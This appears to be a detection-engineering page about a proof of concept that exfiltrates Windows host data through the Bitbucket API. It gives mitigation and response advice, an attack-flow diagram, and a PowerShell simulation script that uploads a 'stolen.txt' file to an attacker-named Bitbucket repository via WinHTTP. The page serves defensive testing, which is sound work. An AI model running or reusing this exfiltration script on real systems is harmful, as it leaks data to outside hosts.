Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
This proof of concept shows how a small C program can abuse the Bitbucket webhook API to exfiltrate host telemetry from a compromised Windows system. It collects details such as hostname, OS build, CPU information, and network adapter data, then hides the output inside the description field of a newly created webhook, blending into normal cloud traffic quietly.
Investigation
The author shares the full source, build steps, and sample curl requests to create, inspect, and delete the webhook used for leakage end-to-end. The compiled binary was executed on a Windows 10 x64 22H2 host in an ANY.RUN sandbox and transmitted data without obvious alerts. The write-up also notes similar Git platform abuse documented in recent APT activity.
Mitigation
Monitor outbound HTTPS to Bitbucket and other code hosts, and flag API calls that create webhooks unexpectedly or contain odd description text. Require strong authentication, limit and scope API tokens, apply least privilege, and audit repository configuration changes regularly.
Response
On detection, block outbound Bitbucket traffic from the host, revoke exposed API tokens, and inventory webhooks across repositories to remove malicious entries. Collect endpoint artifacts for forensics, scan for follow-on payloads, and rotate credentials for CI/CD and developer accounts.
"graph TB %% Class definitions classDef technique fill:#ffcccc classDef tool fill:#cce5ff classDef action fill:#d5f5d6 %% Nodes action_collect["<b>Action</b> – Collect system information"] class action_collect action tech_sysinfo["<b>Technique</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Collects host details such as hostname, OS version, CPU architecture, processor count, logical drives, and IP addresses."] class tech_sysinfo technique tool_bitbucket["<b>Tool</b> – Bitbucket Cloud REST API<br/><b>Method</b>: POST with Base64 encoded username:APIu2011token"] class tool_bitbucket tool tech_webservice["<b>Technique</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Uses a legitimate web service API to send and receive data."] class tech_webservice technique tech_exfil_repo["<b>Technique</b> – <b>T1567.001 Exfiltration Over Web Service: Exfiltration to Code Repository</b><br/><b>Description</b>: Uploads collected data to a codeu2011hosting repository via the serviceu2019s API."] class tech_exfil_repo technique tech_exfil_webhook["<b>Technique</b> – <b>T1567.004 Exfiltration Over Web Service: Exfiltration Over Webhook</b><br/><b>Description</b>: Sends data through a configured webhook to transport information out of the environment."] class tech_exfil_webhook technique tech_obfuscation["<b>Technique</b> – <b>T1001.003 Data Obfuscation: Protocol or Service Impersonation</b><br/><b>Description</b>: Masks malicious traffic as normal API calls to a trusted service."] class tech_obfuscation technique %% Connections action_collect –>|uses| tech_sysinfo tech_sysinfo –>|provides data to| tool_bitbucket tool_bitbucket –>|leverages| tech_webservice tool_bitbucket –>|creates webhook for| tech_exfil_repo tool_bitbucket –>|creates webhook for| tech_exfil_webhook tech_webservice –>|is concealed by| tech_obfuscation tech_exfil_repo –>|exfiltrates data via| tech_obfuscation tech_exfil_webhook –>|exfiltrates data via| tech_obfuscation "
Attack Flow
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The simulated adversary has obtained a small data set (e.g.,C:tempstolen.txt) and wishes to exfiltrate it to a private Bitbucket repository without raising suspicion. To blend in with legitimate development tools, the attacker chooses the native WinHTTP COM object (WinHttp.WinHttpRequest.5.1) because it is commonly present on Windows systems and directly invokes theWinHttpConnectandWinHttpSendRequestfunctions that the detection rule watches.- Create a temporary file containing dummy exfil data.
- Instantiate the WinHTTP COM object.
- Open a POST connection to
https://api.bitbucket.org/2.0/repositories/<team>/<repo>/src. - Set appropriate headers (
Authorization: Basic …,Content-Type: multipart/form-data). - Send the file contents.
- Verify the HTTP 200 response.
This exact sequence causes Sysmon to log a
NetworkConnectevent where the process ispowershell.exeand the function chain includesWinHttpConnectandWinHttpSendRequest, satisfying the Sigma rule. -
Regression Test Script:
# -------------------------------------------------------------- # Bitbucket API Exfiltration via WinHTTP (Trigger Sigma Rule) # -------------------------------------------------------------- $tempFile = "C:tempstolen.txt" $repoOwner = "evilcorp" $repoName = "leaked-data" $username = "eviluser" $appPassword = "APPPASSWD" # Base64 of "username:appPassword" $authHeader = "Basic " + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("$username:$appPassword")) # 1. Create dummy data if not present if (-not (Test-Path $tempFile)) { "Sensitive data collected by adversary" | Set-Content -Path $tempFile -Encoding UTF8 } # 2. Build multipart/form-data payload $boundary = "----WebKitFormBoundary$(Get-Random -Maximum 999999)" $body = @" --$boundary Content-Disposition: form-data; name="files"; filename="$(Split-Path $tempFile -Leaf)" Content-Type: application/octet-stream
$(Get-Content $tempFile -Raw) –$boundary– “@
# 3. Initialise WinHTTP COM object
$winHttp = New-Object -ComObject "WinHttp.WinHttpRequest.5.1"
# 4. Open POST request
$url = "https://api.bitbucket.org/2.0/repositories/$repoOwner/$repoName/src"
$winHttp.Open("POST", $url, $false) # synchronous request
# 5. Set required headers
$winHttp.SetRequestHeader("Authorization", $authHeader)
$winHttp.SetRequestHeader("Content-Type", "multipart/form-data; boundary=$boundary")
$winHttp.SetRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
# 6. Send payload (this triggers WinHttpConnect + WinHttpSendRequest)
$winHttp.Send($body)
# 7. Output response status for verification
Write-Host "HTTP Status:" $winHttp.Status
Write-Host "Response Body:" $winHttp.ResponseText
```-
Cleanup Commands:
# Remove temporary file Remove-Item -Path "C:tempstolen.txt" -Force -ErrorAction SilentlyContinue # Optionally revoke the Bitbucket app password manually via web UI Write-Host "Cleanup complete. Remember to delete the uploaded file from the repository if needed."